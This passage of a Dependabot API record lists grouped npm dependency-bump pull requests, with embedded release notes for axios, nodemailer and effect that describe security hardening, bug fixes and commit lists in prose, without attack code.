HTTP adapter and \u003ccode\u003eresolveConfig\u003c/code\u003e/\u003ccode\u003emergeConfig\u003c/code\u003e/validator paths to read only own properties and use null-prototype config objects, preventing polluted \u003ccode\u003eauth\u003c/code\u003e, \u003ccode\u003ebaseURL\u003c/code\u003e, \u003ccode\u003esocketPath\u003c/code\u003e, \u003ccode\u003ebeforeRedirect\u003c/code\u003e, and \u003ccode\u003einsecureHTTPParser\u003c/code\u003e from influencing requests. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10779\"\u003e#10779\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eSSRF via \u003ccode\u003esocketPath\u003c/code\u003e:\u003c/strong\u003e Rejects non-string \u003ccode\u003esocketPath\u003c/code\u003e values and adds an opt-in \u003ccode\u003eallowedSocketPaths\u003c/code\u003e config option to restrict permitted Unix domain socket paths, returning \u003ccode\u003eAxiosError\u003c/code\u003e \u003ccode\u003eERR_BAD_OPTION_VALUE\u003c/code\u003e on mismatch. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10777\"\u003e#10777\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eSupply-chain Hardening:\u003c/strong\u003e Added \u003ccode\u003e.npmrc\u003c/code\u003e with \u003ccode\u003eignore-scripts=true\u003c/code\u003e, lockfile lint CI, non-blocking reproducible build diff, scoped CODEOWNERS, expanded \u003ccode\u003eSECURITY.md\u003c/code\u003e/\u003ccode\u003eTHREATMODEL.md\u003c/code\u003e with provenance verification (\u003ccode\u003enpm audit signatures\u003c/code\u003e), 60-day resolution policy, and maintainer incident-response runbook. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10776\"\u003e#10776\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🚀 New Features\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eallowedSocketPaths\u003c/code\u003e Config Option:\u003c/strong\u003e New request config option (and TypeScript types) to allowlist Unix domain socket paths used by the Node http adapter; backwards compatible when unset. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10777\"\u003e#10777\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🐛 Bug Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eKeep-alive Socket Memory Leak:\u003c/strong\u003e Installs a single per-socket \u003ccode\u003eerror\u003c/code\u003e listener tracking the active request via \u003ccode\u003ekAxiosSocketListener\u003c/code\u003e/\u003ccode\u003ekAxiosCurrentReq\u003c/code\u003e, eliminating per-request listener accumulation, \u003ccode\u003eMaxListenersExceededWarning\u003c/code\u003e, and linear heap growth under concurrent or long-running keep-alive workloads (fixes \u003ca href=\"https://redirect.github.com/axios/axios/issues/10780\"\u003e#10780\u003c/a\u003e). (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10788\"\u003e#10788\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🔧 Maintenance \u0026amp; Chores\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eChangelog:\u003c/strong\u003e Updated \u003ccode\u003eCHANGELOG.md\u003c/code\u003e with v1.15.1 release notes. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10781\"\u003e#10781\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/axios/axios/compare/v1.15.1...v1.15.2\"\u003eFull Changelog\u003c/a\u003e\u003c/p\u003e\n\u003chr /\u003e\n\u003ch2\u003ev1.15.1 - April 19, 2026\u003c/h2\u003e\n\u003cp\u003eThis release ships a coordinated set of security hardening fixes across headers, body/redirect limits, multipart handling, and XSRF/prototype-pollution vectors, alongside a broad sweep of bug fixes, test migrations, and threat-model documentation updates.\u003c/p\u003e\n\u003ch2\u003e🔒 Security Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003eHeader Injection Hardening:\u003c/strong\u003e Tightened validation and sanitisation across request header construction to close the header-injection attack surface. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10749\"\u003e#10749\u003c/a\u003e\u003c/strong\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003eCRLF Stripping in Multipart Headers:\u003c/strong\u003e Correctly strips CR/LF from multipart header values to prevent injection via field names and filenames. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10758\"\u003e#10758\u003c/a\u003e\u003c/strong\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003ePrototype Pollution / Auth Bypass:\u003c/strong\u003e Replaced unsafe \u003ccode\u003ein\u003c/code\u003e checks with \u003ccode\u003ehasOwnProperty\u003c/code\u003e to prevent authentication bypass via prototype pollution on config objects, with additional regression tests. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10761\"\u003e#10761\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10760\"\u003e#10760\u003c/a\u003e\u003c/strong\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ccode\u003ewithXSRFToken\u003c/code\u003e Truthy Bypass:\u003c/strong\u003e Short-circuits on any truthy non-boolean value, so an ambiguous config no longer silently leaks the XSRF token cross-origin. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10762\"\u003e#10762\u003c/a\u003e\u003c/strong\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ccode\u003emaxBodyLength\u003c/code\u003e With Zero Redirects:\u003c/strong\u003e Enforces \u003ccode\u003emaxBodyLength\u003c/code\u003e even when \u003ccode\u003emaxRedirects\u003c/code\u003e is set to \u003ccode\u003e0\u003c/code\u003e, closing a bypass path for oversized request bodies. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10753\"\u003e#10753\u003c/a\u003e\u003c/strong\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003eStreamed Response \u003ccode\u003emaxContentLength\u003c/code\u003e Bypass:\u003c/strong\u003e Applies \u003ccode\u003emaxContentLength\u003c/code\u003e to streamed responses that previously bypassed the cap. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10754\"\u003e#10754\u003c/a\u003e\u003c/strong\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003eFollow-up CVE Completion:\u003c/strong\u003e Completes an earlier incomplete CVE fix to fully close the regression window. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10755\"\u003e#10755\u003c/a\u003e\u003c/strong\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🚀 New Features\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eAI-Based Docs Translations:\u003c/strong\u003e Initial scaffold for AI-assisted translations of the documentation site. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10705\"\u003e#10705\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/582934382e4e0e0bcb679c628071a4203e93cf57\"\u003e\u003ccode\u003e5829343\u003c/code\u003e\u003c/a\u003e chore(release): prepare release 1.15.2 (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10789\"\u003e#10789\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/4709a48fa2717ba97f43f5432d48ca4e26c2d326\"\u003e\u003ccode\u003e4709a48\u003c/code\u003e\u003c/a\u003e fix: added fix for memory leak in sockets (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10788\"\u003e#10788\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/be3336014e01f9a4fc1f8aef15303cf7daaf58db\"\u003e\u003ccode\u003ebe33360\u003c/code\u003e\u003c/a\u003e chore: update changelog (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10781\"\u003e#10781\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/47915144662f2733e6c051bdcb895a8c8f0586aa\"\u003e\u003ccode\u003e4791514\u003c/code\u003e\u003c/a\u003e fix: more header pollutions (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10779\"\u003e#10779\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/6feafcff6c2dbafe206161c5d09e38e1d36af66f\"\u003e\u003ccode\u003e6feafcf\u003c/code\u003e\u003c/a\u003e fix: socket issue (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10777\"\u003e#10777\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/302e2739c602f00e323d4f3f5c79500647633a73\"\u003e\u003ccode\u003e302e273\u003c/code\u003e\u003c/a\u003e docs: update docs, add a couple actions etc (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10776\"\u003e#10776\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/ac42446be51300fe214ba3c6e40cc95f34fd6871\"\u003e\u003ccode\u003eac42446\u003c/code\u003e\u003c/a\u003e chore(release): prepare release 1.15.1 (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10767\"\u003e#10767\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/908f2206b6bfeff67236784abce85935698ac1d9\"\u003e\u003ccode\u003e908f220\u003c/code\u003e\u003c/a\u003e docs: update threatmodel (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10765\"\u003e#10765\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/f93f8155250c2e066205521eda05ae22983a1f6d\"\u003e\u003ccode\u003ef93f815\u003c/code\u003e\u003c/a\u003e docs: added docs around potential decompressions bomb (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10763\"\u003e#10763\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/1728aa1b15b8857f970611fd8983c06b423fc486\"\u003e\u003ccode\u003e1728aa1\u003c/code\u003e\u003c/a\u003e fix: short-circuits on any truthy non-boolean in withXSRFToken (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10762\"\u003e#10762\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/axios/axios/compare/v1.13.5...v1.15.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eInstall script changes\u003c/summary\u003e\n\u003cp\u003eThis version modifies \u003ccode\u003eprepare\u003c/code\u003e script that runs during installation. Review the package contents before updating.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `nodemailer` from 7.0.11 to 8.0.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nodemailer/nodemailer/releases\"\u003enodemailer's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev8.0.5\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/nodemailer/nodemailer/compare/v8.0.4...v8.0.5\"\u003e8.0.5\u003c/a\u003e (2026-04-07)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003edecode SMTP server responses as UTF-8 at line boundary (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/95876b103e587e49583e43f88cb2c3a61556f3ac\"\u003e95876b1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003esanitize CRLF in transport name option to prevent SMTP command injection (GHSA-vvjj-xcjg-gr5g) (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/0a43876801a420ca528f492eaa01bfc421cc306e\"\u003e0a43876\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev8.0.4\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/nodemailer/nodemailer/compare/v8.0.3...v8.0.4\"\u003e8.0.4\u003c/a\u003e (2026-03-25)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003esanitize envelope size to prevent SMTP command injection (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/2d7b9710e63555a1eb13d721296c51186d4b5651\"\u003e2d7b971\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev8.0.3\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/nodemailer/nodemailer/compare/v8.0.2...v8.0.3\"\u003e8.0.3\u003c/a\u003e (2026-03-18)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eclean up addressparser and fix group name fallback producing undefined (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/9d55877f8ed15a6aefd7ba76cbb6b6a6cdbcc4fd\"\u003e9d55877\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix cookie bugs, remove dead code, and improve hot-path efficiency (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/e8c8b92f46f2a82d06d49cc9a6ffc26067f68524\"\u003ee8c8b92\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003erefactor smtp-connection for clarity and add Node.js 6 syntax compat test (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/c5b48ea61c28eabf347972f4198a12cdab226ff7\"\u003ec5b48ea\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eremove familySupportCache that broke DNS resolution tests (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/c803d901f195a21edbb2c276b2e116564467aaaa\"\u003ec803d90\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev8.0.2\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/nodemailer/nodemailer/compare/v8.0.1...v8.0.2\"\u003e8.0.2\u003c/a\u003e (2026-03-09)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003emerge fragmented display names with unquoted commas in addressparser (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/fe27f7fd57f7587d897274438da2f628ad0ad7d9\"\u003efe27f7f\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev8.0.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/nodemailer/nodemailer/compare/v8.0.0...v8.0.1\"\u003e8.0.1\u003c/a\u003e (2026-02-07)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eabsorb TLS errors during socket teardown (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/7f8dde41438c66b8311e888fa5f8c518fcaba6f1\"\u003e7f8dde4\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eabsorb TLS errors during socket teardown (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/381f628d55e62bb3131bd2a452fa1ce00bc48aea\"\u003e381f628\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdd Gmail Workspace service configuration (\u003ca href=\"https://redirect.github.com/nodemailer/nodemailer/issues/1787\"\u003e#1787\u003c/a\u003e) (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/dc97ede417b3030b311771541b1f17f5ca76bcbf\"\u003edc97ede\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev8.0.0\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/nodemailer/nodemailer/compare/v7.0.13...v8.0.0\"\u003e8.0.0\u003c/a\u003e (2026-02-04)\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nodemailer/nodemailer/blob/master/CHANGELOG.md\"\u003enodemailer's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/nodemailer/nodemailer/compare/v8.0.4...v8.0.5\"\u003e8.0.5\u003c/a\u003e (2026-04-07)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003edecode SMTP server responses as UTF-8 at line boundary (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/95876b103e587e49583e43f88cb2c3a61556f3ac\"\u003e95876b1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003esanitize CRLF in transport name option to prevent SMTP command injection (GHSA-vvjj-xcjg-gr5g) (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/0a43876801a420ca528f492eaa01bfc421cc306e\"\u003e0a43876\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/nodemailer/nodemailer/compare/v8.0.3...v8.0.4\"\u003e8.0.4\u003c/a\u003e (2026-03-25)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003esanitize envelope size to prevent SMTP command injection (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/2d7b9710e63555a1eb13d721296c51186d4b5651\"\u003e2d7b971\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/nodemailer/nodemailer/compare/v8.0.2...v8.0.3\"\u003e8.0.3\u003c/a\u003e (2026-03-18)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eclean up addressparser and fix group name fallback producing undefined (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/9d55877f8ed15a6aefd7ba76cbb6b6a6cdbcc4fd\"\u003e9d55877\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix cookie bugs, remove dead code, and improve hot-path efficiency (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/e8c8b92f46f2a82d06d49cc9a6ffc26067f68524\"\u003ee8c8b92\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003erefactor smtp-connection for clarity and add Node.js 6 syntax compat test (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/c5b48ea61c28eabf347972f4198a12cdab226ff7\"\u003ec5b48ea\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eremove familySupportCache that broke DNS resolution tests (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/c803d901f195a21edbb2c276b2e116564467aaaa\"\u003ec803d90\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/nodemailer/nodemailer/compare/v8.0.1...v8.0.2\"\u003e8.0.2\u003c/a\u003e (2026-03-09)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003emerge fragmented display names with unquoted commas in addressparser (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/fe27f7fd57f7587d897274438da2f628ad0ad7d9\"\u003efe27f7f\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/nodemailer/nodemailer/compare/v8.0.0...v8.0.1\"\u003e8.0.1\u003c/a\u003e (2026-02-07)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eabsorb TLS errors during socket teardown (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/7f8dde41438c66b8311e888fa5f8c518fcaba6f1\"\u003e7f8dde4\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eabsorb TLS errors during socket teardown (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/381f628d55e62bb3131bd2a452fa1ce00bc48aea\"\u003e381f628\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdd Gmail Workspace service configuration (\u003ca href=\"https://redirect.github.com/nodemailer/nodemailer/issues/1787\"\u003e#1787\u003c/a\u003e) (\u003ca href=\"https://github.com/nodemailer/nodemailer/commit/dc97ede417b3030b311771541b1f17f5ca76bcbf\"\u003edc97ede\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/nodemailer/nodemailer/compare/v7.0.13...v8.0.0\"\u003e8.0.0\u003c/a\u003e (2026-02-04)\u003c/h2\u003e\n\u003ch3\u003e⚠ BREAKING CHANGES\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eError code 'NoAuth' renamed to 'ENOAUTH'\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csu...\n\n_Description has been truncated_","html_url":"https://github.com/stevewithington/daytona/pull/2","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/stevewithington%2Fdaytona/issues/2","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/2/packages"}},{"old_version":"5.2.0","new_version":"5.2.4","update_type":"patch","path":null,"pr_created_at":"2026-05-27T03:25:36.000Z","version_change":"5.2.0 → 5.2.4","issue":{"uuid":"4529231053","node_id":"PR_kwDOQ5VgK87fqYAw","number":3,"state":"open","title":"chore(deps): Bump the npm_and_yarn group across 3 directories with 12 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":3,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-05-27T03:25:36.000Z","updated_at":"2026-05-27T03:27:14.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): Bump","group_name":"npm_and_yarn","update_count":12,"packages":[{"name":"vite","old_version":"7.1.7","new_version":"7.3.2","repository_url":"https://github.com/vitejs/vite"},{"name":"postcss","old_version":"8.5.3","new_version":"8.5.10","repository_url":"https://github.com/postcss/postcss"},{"name":"srvx","old_version":"0.10.0","new_version":"0.11.13","repository_url":"https://github.com/h3js/srvx"},{"name":"nitropack","old_version":"2.12.6","new_version":"2.13.4","repository_url":"https://github.com/nitrojs/nitro"},{"name":"webpack-dev-server","old_version":"5.2.0","new_version":"5.2.4","repository_url":"https://github.com/webpack/webpack-dev-server"},{"name":"better-auth","old_version":"1.3.27","new_version":"1.6.2","repository_url":"https://github.com/better-auth/better-auth"},{"name":"js-cookie","old_version":"3.0.5","new_version":"3.0.7","repository_url":"https://github.com/js-cookie/js-cookie"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 2 updates in the / directory: [effect](https://github.com/Effect-TS/effect/tree/HEAD/packages/effect) and [vite](https://github.com/vitejs/vite/tree/HEAD/packages/vite).\nBumps the npm_and_yarn group with 2 updates in the /repos/effect-atom directory: [effect](https://github.com/Effect-TS/effect/tree/HEAD/packages/effect) and [vite](https://github.com/vitejs/vite/tree/HEAD/packages/vite).\nBumps the npm_and_yarn group with 7 updates in the /repos/tanstack-router directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [vite](https://github.com/vitejs/vite/tree/HEAD/packages/vite) | `7.1.7` | `7.3.2` |\n| [postcss](https://github.com/postcss/postcss) | `8.5.3` | `8.5.10` |\n| [srvx](https://github.com/h3js/srvx) | `0.10.0` | `0.11.13` |\n| [nitropack](https://github.com/nitrojs/nitro) | `2.12.6` | `2.13.4` |\n| [webpack-dev-server](https://github.com/webpack/webpack-dev-server) | `5.2.0` | `5.2.4` |\n| [better-auth](https://github.com/better-auth/better-auth/tree/HEAD/packages/better-auth) | `1.3.27` | `1.6.2` |\n| [js-cookie](https://github.com/js-cookie/js-cookie) | `3.0.5` | `3.0.7` |\n\n\nUpdates `effect` from 3.19.14 to 3.20.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/Effect-TS/effect/releases\"\u003eeffect's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eeffect@3.20.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6124\"\u003e#6124\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/8798a843218e6c0c0d3a8eee83360880e370b4da\"\u003e\u003ccode\u003e8798a84\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/mikearnaldi\"\u003e\u003ccode\u003e@​mikearnaldi\u003c/code\u003e\u003c/a\u003e! - Fix scheduler task draining to isolate \u003ccode\u003eAsyncLocalStorage\u003c/code\u003e across fibers.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6107\"\u003e#6107\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/fc82e81448bd9136a37580139ce46a2c61b11b54\"\u003e\u003ccode\u003efc82e81\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/gcanti\"\u003e\u003ccode\u003e@​gcanti\u003c/code\u003e\u003c/a\u003e! - Backport \u003ccode\u003eTypes.VoidIfEmpty\u003c/code\u003e to 3.x\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6088\"\u003e#6088\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/82996bce8debffcb44feb98bb862cf2662bd56b7\"\u003e\u003ccode\u003e82996bc\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/taylorOntologize\"\u003e\u003ccode\u003e@​taylorOntologize\u003c/code\u003e\u003c/a\u003e! - Schema: fix \u003ccode\u003eSchema.omit\u003c/code\u003e producing wrong result on Struct with \u003ccode\u003eoptionalWith({ default })\u003c/code\u003e and index signatures\u003c/p\u003e\n\u003cp\u003e\u003ccode\u003egetIndexSignatures\u003c/code\u003e now handles \u003ccode\u003eTransformation\u003c/code\u003e AST nodes by delegating to \u003ccode\u003east.to\u003c/code\u003e, matching the existing behavior of \u003ccode\u003egetPropertyKeys\u003c/code\u003e and \u003ccode\u003egetPropertyKeyIndexedAccess\u003c/code\u003e. Previously, \u003ccode\u003eSchema.omit\u003c/code\u003e on a struct combining \u003ccode\u003eSchema.optionalWith\u003c/code\u003e (with \u003ccode\u003e{ default }\u003c/code\u003e, \u003ccode\u003e{ as: \u0026quot;Option\u0026quot; }\u003c/code\u003e, etc.) and \u003ccode\u003eSchema.Record\u003c/code\u003e would silently take the wrong code path, returning a Transformation with property signatures instead of a TypeLiteral with index signatures.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6086\"\u003e#6086\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/4d97a61a15b9dd6a0eece65b8f0c035e16d42ada\"\u003e\u003ccode\u003e4d97a61\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/taylorOntologize\"\u003e\u003ccode\u003e@​taylorOntologize\u003c/code\u003e\u003c/a\u003e! - Schema: fix \u003ccode\u003egetPropertySignatures\u003c/code\u003e crash on Struct with \u003ccode\u003eoptionalWith({ default })\u003c/code\u003e and other Transformation-producing variants\u003c/p\u003e\n\u003cp\u003e\u003ccode\u003eSchemaAST.getPropertyKeyIndexedAccess\u003c/code\u003e now handles \u003ccode\u003eTransformation\u003c/code\u003e AST nodes by delegating to \u003ccode\u003east.to\u003c/code\u003e, matching the existing behavior of \u003ccode\u003egetPropertyKeys\u003c/code\u003e. Previously, calling \u003ccode\u003egetPropertySignatures\u003c/code\u003e on a 